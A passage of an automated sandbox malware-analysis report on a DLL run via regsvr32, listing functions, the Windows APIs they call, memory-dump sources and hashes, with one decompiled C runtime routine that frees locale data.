				ExitProcess(_a4);
			}

0x6e45efe2
0x6e45effe
0x6e45effe
0x6e45f007
0x6e45f010

APIs

GetCurrentProcess.KERNEL32(?,?,6E45EFD4,6E457C85,?,?,6E457C85), ref: 6E45EFF7
TerminateProcess.KERNEL32(00000000,?,6E45EFD4,6E457C85,?,?,6E457C85), ref: 6E45EFFE
ExitProcess.KERNEL32 ref: 6E45F010

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 49dd926eafdb160b7a52c66bfb2e66259bc74ed98b1a281cfaac251db9dbeb2c
Instruction ID: 6d358284e24edc65f67d2a93039b92264fc5a7971a93afb05f1e53f28477220e
Opcode Fuzzy Hash: 49dd926eafdb160b7a52c66bfb2e66259bc74ed98b1a281cfaac251db9dbeb2c
Instruction Fuzzy Hash: 13E0B635001648AFCF916FF4D908E583FADFB41B99B540419FA098A221CB36E951CB85

Uniqueness

Uniqueness Score: -1.00%

Function 6E45FDC5 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E45FDC0,?,?,00000008,?,?,6E46A715,00000000), ref: 6E45FFF2

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: c73c28688f39acae3140937aadaa29429642b7a0ca042cc713a68436028bd67c
Instruction ID: b604b3f46e2c3b2eb3204792cf5b9c304957eb8ac90092c3f78ba07d01e2f1b7
Opcode Fuzzy Hash: c73c28688f39acae3140937aadaa29429642b7a0ca042cc713a68436028bd67c
Instruction Fuzzy Hash: 4CB15932210609CFDB54CF68C496F547BA1FF45364F25865AE8A9CF3A2C335E992CB41

Uniqueness

Uniqueness Score: -1.00%

Function 6E41ECD0 Relevance: 1.7, Strings: 1, Instructions: 433COMMON

Download Yara Rule

Strings

dbAn, xrefs: 6E41ECDE

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: __aullrem
String ID: dbAn
API String ID: 3758378126-2637926941
Opcode ID: 3da10439df823de2c93d66cf4a1a97f37b3c8ad689d50ddb5c10f3d6cd5c835f
Instruction ID: c184d9cc0b6d691be456c2e98961fd345c4c911e81c9ea17aa00489159873354
Opcode Fuzzy Hash: 3da10439df823de2c93d66cf4a1a97f37b3c8ad689d50ddb5c10f3d6cd5c835f
Instruction Fuzzy Hash: DB32B274E05269CFCB54CFA9C990BEDBBB1BF49304F20819AD859A7355D730AA82CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E45AACC Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E45AAE2

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: e641e5619b3067d017c61067c9e782ad4c5cf50c151ad84d92d81d45f34cc82e
Instruction ID: d079f057dde42351c95cc15896cc5c2fa3bcdd2cf40b6492876c1f653851bd1f
Opcode Fuzzy Hash: e641e5619b3067d017c61067c9e782ad4c5cf50c151ad84d92d81d45f34cc82e
Instruction Fuzzy Hash: 7D517BB1A106268FDF15CFB4D590BAEB7F1FB48391F10852AC515EB340D3749A11DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E462F53 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fe83858beaccc92a749c4d11d4371d1cdfe81cd8617375e87ba94dd335e27d8
Instruction ID: 1141372a9609b9a293b1dc8a67d91ba9b9927b70f67217a4ff6c3c8bce45958b
Opcode Fuzzy Hash: 9fe83858beaccc92a749c4d11d4371d1cdfe81cd8617375e87ba94dd335e27d8
Instruction Fuzzy Hash: CB41A471804259AEDF54DFB9CC98EEABBB9AF85304F1442DEE41DE3210DA319E858F50

Uniqueness

Uniqueness Score: -1.00%

Function 6E45E2BD Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

0, xrefs: 6E45E44D

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 7bf3f77ff6ae5f9a29cb739caa13e1d3cefa0b3de6ce9cbf091ef9e9c4d25b8b
Instruction ID: 035b58321f769e77e44309bcbb6b97e5ea36aab5a8f13f9a130540c9804e8eb8
Opcode Fuzzy Hash: 7bf3f77ff6ae5f9a29cb739caa13e1d3cefa0b3de6ce9cbf091ef9e9c4d25b8b
Instruction Fuzzy Hash: 2A615B716402069ADB588EFA88E0FBE73A9AF47708F40092FE442DB394D762D976C751

Uniqueness

Uniqueness Score: -1.00%

Function 6E41A390 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

KERNEL32.dll, xrefs: 6E41A59F

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID: KERNEL32.dll
API String ID: 0-254546324
Opcode ID: 6bbeb87932fcbbb4a30857307b14a7972752962c7eadfd64f6bff5e48f49f139
Instruction ID: ad6282bb76d4e1923c9a0d4aaf09d268374f7e373ea7393b6e167978ce634716
Opcode Fuzzy Hash: 6bbeb87932fcbbb4a30857307b14a7972752962c7eadfd64f6bff5e48f49f139
Instruction Fuzzy Hash: F4C1A474E08219DFCB04CFA9C490BEDBBB1BF88314F24819AD859AB355D730A986DF54

Uniqueness

Uniqueness Score: -1.00%

Function 6E463FE0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6E463FE0

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 2081670d5425ff656820fab48b791d845934c54c4099c932d54d838bfb309c65
Instruction ID: d8ded7a43e709edc295de992520e4ab9be16afd586da3c945d68ee6caac8414f
Opcode Fuzzy Hash: 2081670d5425ff656820fab48b791d845934c54c4099c932d54d838bfb309c65
Instruction Fuzzy Hash: E0A011B0A02A008B8F80AEB0A20820C3AE8BA0A2A0B800028E008C8000EB2888008A00

Uniqueness

Uniqueness Score: -1.00%

Function 6E415580 Relevance: .7, Instructions: 726COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b636b68c4b48510c3c8f9c2a159b69bf32b66063bfda885838e32a7c9ee3926
Instruction ID: 9ca6eb4bd2cca63bc9c563af6c304478c4f6f96fc94d80ffb54823a338ffdbaa
Opcode Fuzzy Hash: 3b636b68c4b48510c3c8f9c2a159b69bf32b66063bfda885838e32a7c9ee3926
Instruction Fuzzy Hash: 24928C74E092698FDB64CFA8C890BEDBBB1BF49304F1081DAD859A7355D734AA81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E41E160 Relevance: .7, Instructions: 661COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 475eb9272c39bef41ff64967759797a4fb97c9ee95941c26b9afea30f9c68fca
Instruction ID: f149eccfca223e2eca52530d6724e858db5d0df50fa49bd838163029bd522c8a
Opcode Fuzzy Hash: 475eb9272c39bef41ff64967759797a4fb97c9ee95941c26b9afea30f9c68fca
Instruction Fuzzy Hash: CB828D78E052698FDB64CF99C890BEDBBB1BF89304F1081DAD859A7355D730AA81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E4589F0 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0845d39234441d3546b262734aba4347abc5eacb5043c7c18a27632ee21bc768
Instruction ID: 7e90d4ce9a34ef7dbbd53e351a9cfabb3acc679c4ebfa7508b2559fd3a42cf1a
Opcode Fuzzy Hash: 0845d39234441d3546b262734aba4347abc5eacb5043c7c18a27632ee21bc768
Instruction Fuzzy Hash: 9A9192B4E05259DFCB44CFA9C490AADFBB1FF88304F2081AAD859AB355D734A942CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E41DF70 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce2ecb61f320e0a282adcceb5aadcc618f0158b5ecdbd4ba8ee3dda18e5ed05
Instruction ID: 658746a00d80a7c19ec10d93f2e38e2cff5eafd03ce849c23037a2d6913159f3
Opcode Fuzzy Hash: 6ce2ecb61f320e0a282adcceb5aadcc618f0158b5ecdbd4ba8ee3dda18e5ed05
Instruction Fuzzy Hash: AB719DB8E092599FCB08CFE8C590AEDFBB1BF48304F20815AE855A7345D730AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 6E420BEE Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa9cc3db3d22e5828045ae2f33e001fad46fb6b4606783a1a79f1918fb0f8d7b
Instruction ID: f64be5411a5fa31a4acf7d7b552fb7cb80898912c1e21417f6dc14a16a6f6fd8
Opcode Fuzzy Hash: fa9cc3db3d22e5828045ae2f33e001fad46fb6b4606783a1a79f1918fb0f8d7b
Instruction Fuzzy Hash: 346181B4E052698FCB64CF58C990ADDBBB1BF48304F1081EAD649A7345DA30AE81CF58

Uniqueness

Uniqueness Score: -1.00%

Function 6E4585F0 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1083b562e57d6fcdb7a0cef3685f2573a546d89591e8eba71522b663db6eeb62
Instruction ID: 105f8e5e38547c6d8940ffa2e45ba69e2bb62f12ce9bf5cd854bbda8517f95c3
Opcode Fuzzy Hash: 1083b562e57d6fcdb7a0cef3685f2573a546d89591e8eba71522b663db6eeb62
Instruction Fuzzy Hash: 7451AD70D00219EFCB48CF99D6919AEFBB5FB89300F20C5AAD855AB350D634AB41DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4691DC Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2787940220a8159602ae1ae2d23f92ac97ddf98975370d1505fa2c05f0e6eb2b
Instruction ID: 22a17f20f64a8ff113226caaa93f6a48a5ee304a8bf70bb08544fd2909630012
Opcode Fuzzy Hash: 2787940220a8159602ae1ae2d23f92ac97ddf98975370d1505fa2c05f0e6eb2b
Instruction Fuzzy Hash: 7121B373F208394B7B0CC47E8C522BDB6E1C68C541745823AE8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 6E4690BC Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be0ea2eeef507e9346c442e4dcac2db3d1139c75150f5b2f29baa435f1db82a7
Instruction ID: cdc500379e23bca7ad90b7d51fcdb59cf91a3d92474fece92baf03ba9eebcf22
Opcode Fuzzy Hash: be0ea2eeef507e9346c442e4dcac2db3d1139c75150f5b2f29baa435f1db82a7
Instruction Fuzzy Hash: 50117723F30C356B775C81BD8C172BA96D2EBD825071F533AD826E7284E994DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 6E462B7D Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfd12b1a0d0b8e6caa066fc1ab38d0f6471a767ef731ffd7961338eb6f2b47a8
Instruction ID: a95971ab14970925a4f9bff24c67909857585a966144da760bac5cc8bb4761b6
Opcode Fuzzy Hash: bfd12b1a0d0b8e6caa066fc1ab38d0f6471a767ef731ffd7961338eb6f2b47a8
Instruction Fuzzy Hash: B2E08272A11228FBCB10CFE8C940E8AF3ECEB89E04B1185ABB501E3200C670DE00CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 6E421160 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
Instruction ID: 0230c4de2727f5ca7c94c7bd14938b1f1fc6463ea35c1893f292ab52552c7abd
Opcode Fuzzy Hash: 5b0d8a4e177a3fa34641ad4046624ba9fb0ebdcef63e2a9b0089d13ea34cf4d4
Instruction Fuzzy Hash: 8CB011322A2B88CBC202CA8CE080E80B3ECE308E20F0000A0E80883B22C228FC00C880

Uniqueness

Uniqueness Score: -1.00%

Function 6E4648B2 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E4648B2(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e474710) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E4610BE(_t46);
							E6E467864( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E4610BE(_t47);
							E6E467962( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E4610BE( *((intOrPtr*)(_t74 + 0x7c)));
						E6E4610BE( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E4610BE( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E4610BE( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E4610BE( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E4610BE( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E464A23( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa4
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x2c
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e4741d8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E4610BE(_t31);
							E6E4610BE( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E4610BE(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E4610BE(_t74);
			}

0x6e4648ba
0x6e4648be
0x6e4648c6
0x6e4648cf
0x6e4648d4
0x6e4648db
0x6e4648e3
0x6e4648eb
0x6e4648f6
0x6e4648fc
0x6e4648fd
0x6e464905
0x6e46490d
0x6e464918
0x6e46491e
0x6e464922
0x6e46492d
0x6e464933
0x6e4648d4
0x6e464934
0x6e46493c
0x6e46494f
0x6e464962
0x6e464970
0x6e46497b
0x6e464980
0x6e464989
0x6e464991
0x6e464992
0x6e464992
0x6e464998
0x6e46499b
0x6e46499b
0x6e46499e
0x6e4649a5
0x6e4649a7
0x6e4649ab
0x6e4649b3
0x6e4649ba
0x6e4649c0
0x6e4649c1
0x6e4649c1
0x6e4649c8
0x6e4649ca
0x6e4649cf
0x6e4649d7
0x6e4649dc
0x6e4649dd
0x6e4649dd
0x6e4649e0
0x6e4649e3
0x6e4649e6
0x6e4649e9
0x6e4649e9
0x6e4649f9

APIs

___free_lconv_mon.LIBCMT ref: 6E4648F6

Part of subcall function 6E467864: _free.LIBCMT ref: 6E467881
Part of subcall function 6E467864: _free.LIBCMT ref: 6E467893
Part of subcall function 6E467864: _free.LIBCMT ref: 6E4678A5
Part of subcall function 6E467864: _free.LIBCMT ref: 6E4678B7
Part of subcall function 6E467864: _free.LIBCMT ref: 6E4678C9
Part of subcall function 6E467864: _free.LIBCMT ref: 6E4678DB
Part of subcall function 6E467864: _free.LIBCMT ref: 6E4678ED
Part of subcall function 6E467864: _free.LIBCMT ref: 6E4678FF
Part of subcall function 6E467864: _free.LIBCMT ref: 6E467911
Part of subcall function 6E467864: _free.LIBCMT ref: 6E467923
Part of subcall function 6E467864: _free.LIBCMT ref: 6E467935
Part of subcall function 6E467864: _free.LIBCMT ref: 6E467947
Part of subcall function 6E467864: _free.LIBCMT ref: 6E467959

_free.LIBCMT ref: 6E4648EB

Part of subcall function 6E4610BE: HeapFree.KERNEL32(00000000,00000000), ref: 6E4610D4
Part of subcall function 6E4610BE: GetLastError.KERNEL32(00000004,?,6E4679F5,00000004,00000000,00000004,?,?,6E467A1C,00000004,00000007,00000004,?,6E464A49,00000004,00000004), ref: 6E4610E6

_free.LIBCMT ref: 6E46490D
_free.LIBCMT ref: 6E464922
_free.LIBCMT ref: 6E46492D
_free.LIBCMT ref: 6E46494F
_free.LIBCMT ref: 6E464962
_free.LIBCMT ref: 6E464970
_free.LIBCMT ref: 6E46497B
_free.LIBCMT ref: 6E4649B3
_free.LIBCMT ref: 6E4649BA
_free.LIBCMT ref: 6E4649D7
_free.LIBCMT ref: 6E4649EF

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 77495ca810d11308ac83ad696411e6708062ab295e26d0d451a139b121d62012
